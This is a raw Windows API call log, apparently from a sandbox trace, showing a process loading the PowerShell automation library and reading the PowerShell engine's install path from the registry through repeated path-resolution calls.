	[0344.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d5d8 | out: phkResult=0x26d5d8*=0x2e0) returned 0x0
	[0344.179] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d55c, lpData=0x0, lpcbData=0x26d558*=0x0 | out: lpType=0x26d55c*=0x1, lpData=0x0, lpcbData=0x26d558*=0x56) returned 0x0
	[0344.179] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ffa40
	[0344.179] RegQueryValueExW (in: hKey=0x2e0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d52c, lpData=0x1b8ffa40, lpcbData=0x26d528*=0x56 | out: lpType=0x26d52c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d528*=0x56) returned 0x0
	[0344.179] CoTaskMemFree (pv=0x1b8ffa40) 
	[0344.179] RegCloseKey (hKey=0x2e0) returned 0x0
	[0344.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.181] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0344.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.181] CoTaskMemFree (pv=0x100100) 
	[0344.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
